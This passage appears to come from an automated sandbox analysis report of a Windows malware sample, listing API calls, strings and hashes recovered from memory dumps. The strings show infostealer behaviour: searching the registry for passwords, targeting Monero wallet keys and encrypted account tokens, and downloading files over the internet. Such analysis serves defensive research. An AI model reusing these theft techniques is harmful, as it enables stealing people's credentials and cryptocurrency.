                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                              • Instruction ID: 00f8227bec764aa5c044994e60427cfc4bdd326b9b026d8d146876532eb5f935
                              • Opcode Fuzzy Hash: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                              • Instruction Fuzzy Hash: 5F218CB1E44209ABDB14DFD4DD4AFAEB7B8FB44B10F10421DF615BB280D778A9018BA5
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                              • InternetOpenA.WININET(00FD0DF7,00000001,00000000,00000000,00000000), ref: 00FB610F
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FB618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00FB61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FB620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00FB6249
                              • InternetCloseHandle.WININET(?), ref: 00FB6253
                              • InternetCloseHandle.WININET(00000000), ref: 00FB6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                              • Instruction ID: b65d145182a00c5ee008aadc94df76d73bf74b2ba94291cc5c644902d26f0fb9
                              • Opcode Fuzzy Hash: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                              • Instruction Fuzzy Hash: C8518EB1900208ABEF24DF51DD45FEE77B8FF04705F1081A8A60AA71C0DB796A85DF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                              • HeapFree.KERNEL32(00000000), ref: 00FB7459
                              • task.LIBCPMTD ref: 00FB7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                              • Instruction ID: ca6c004be3d4bf12ed9d75d0622ae9f63c8de8e69a5327280ad10a2a78b4ee86
                              • Opcode Fuzzy Hash: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                              • Instruction Fuzzy Hash: 70613BB5D04218DBDB24EB51DC41BDAB7BCBF84340F0481E9E649A6141DBB46BCADFA0
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00FBBC9F
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FBBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00FBBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00FBBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                              • Instruction ID: a51ce2b73a4cf7ebe56c2d20a99202afffab2bc7b50eb761c0f66ca3273cba1f
                              • Opcode Fuzzy Hash: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                              • Instruction Fuzzy Hash: 78B13C7191010DABDB18EBA0DE97EEE7339AF54304F40416DF506A2191EF387A49EB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                              • Instruction ID: bf75e267b24a55d6e94fc4aaaad23d767657d932b734e71f4e980dfafb790b36
                              • Opcode Fuzzy Hash: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                              • Instruction Fuzzy Hash: 81F03A30908209EFD3589FE0B50AF2C7B74FF05703F0402ACE61A87284DA795A829BD5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4FD1
                              • InternetOpenA.WININET(00FD0DDF,00000000,00000000,00000000,00000000), ref: 00FB4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FB5041
                              • InternetCloseHandle.WININET(?), ref: 00FB50B9
                              • InternetCloseHandle.WININET(?), ref: 00FB50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 0d4131acf83250e7fe4ee9a6e87f334f2e9f93060b26cf9c1f800ea1f957dbaa
                              • Instruction ID: 75b6650f796c219e3f8e6668744a7d1a6a13765bea0bcb3780d55d2da0c441e5
                              • Opcode Fuzzy Hash: 0d4131acf83250e7fe4ee9a6e87f334f2e9f93060b26cf9c1f800ea1f957dbaa
                              • Instruction Fuzzy Hash: BD3127B5A00218ABCB24DF54DC85BDCB7B4EB48704F1081E9EB09A7284CB746EC59F98
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                              • wsprintfA.USER32 ref: 00FC8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDE90,00000000,000F003F,?,00000400), ref: 00FC84EC
                              • lstrlen.KERNEL32(?), ref: 00FC8501
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDD58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FD0B34), ref: 00FC8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                              • Instruction ID: a0f56f12b7bafc7a6723ede84cd0815d23656aed3b10fdc6d536dc5ab5ac88c8
                              • Opcode Fuzzy Hash: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                              • Instruction Fuzzy Hash: F321F671900218ABDB28DB54DD85FE9B3B8FF48710F0081A9A609A7180DF75AA86DF94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDBCE0,00000000,00020119,00000000), ref: 00FC76DD
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDF50,00000000,00000000,?,000000FF), ref: 00FC76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                              • Instruction ID: b1cde68706288d3a1ac3c1337e2e66bc3273b450f7a8a01b84dc80f77cb100a5
                              • Opcode Fuzzy Hash: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                              • Instruction Fuzzy Hash: 2B018FB5A04309BBD714EBE0E94AF69B7B8EF48701F00406CFA19D7284D6B8A9409F50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDBCE0,00000000,00020119,00FC76B9), ref: 00FC775B
                              • RegQueryValueExA.ADVAPI32(00FC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FC777A
                              • RegCloseKey.ADVAPI32(00FC76B9), ref: 00FC7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                              • Instruction ID: fda3c497a9e31a172258c22a7ec3b588f8c14ddf4bbdc89e07348c5728351167
                              • Opcode Fuzzy Hash: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                              • Instruction Fuzzy Hash: 1F0144B5A40308BBD714DBE0EC4AFAEB7B8EF48701F00416DFA19A7285DAB565408B51
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                              • LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                              • Instruction ID: 43a6e8938df574d92546ac7bce625e0e450e6e1e46110fc13c804e3c9ddeb89c
                              • Opcode Fuzzy Hash: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                              • Instruction Fuzzy Hash: 8C313874E00209EFDB24CF95D985BEE77B8FF48310F108158E915A7290D778A981DFA0
                              APIs
                              • lstrcat.KERNEL32(?,00DEE028), ref: 00FC47DB
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4801
                              • lstrcat.KERNEL32(?,?), ref: 00FC4820
                              • lstrcat.KERNEL32(?,?), ref: 00FC4834
                              • lstrcat.KERNEL32(?,00DDAAD0), ref: 00FC4847
